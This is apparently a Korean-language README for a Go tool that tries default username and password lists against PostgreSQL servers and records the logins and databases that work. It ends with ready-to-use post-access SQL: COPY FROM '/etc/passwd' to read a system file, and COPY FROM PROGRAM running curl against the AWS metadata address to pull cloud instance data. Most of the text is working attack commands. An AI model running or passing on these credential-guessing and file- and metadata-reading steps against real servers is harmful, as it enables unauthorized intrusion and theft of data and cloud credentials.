
이 도구는 기본 자격 증명(credential) 목록을 가져와 PostgreSQL 서버에 대해 테스트하고, 작동하는 자격 증명과 접근 권한이 있는 데이터베이스를 기록합니다.
이 Go 스크립트는 creds.txt라는 파일에서 사용자 이름과 비밀번호 목록을 읽어 PostgreSQL 데이터베이스에 대해 테스트합니다.
이 스크립트는 명령줄 인수 또는 IP 목록이 담긴 텍스트 파일로 PostgreSQL 서버의 IP를 입력받습니다.
접근이 허용되면 스크립트는 이 출력을 pg-output.txt라는 파일에 기록합니다.
postgres 사용자를 사용할 수 있다면 일반적으로 이는 슈퍼유저이며 RCE, LFI 또는 SSRF를 허용할 수 있습니다.
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
/etc/passwd/ 가져오기
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - AWS 메타데이터 가져오기
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;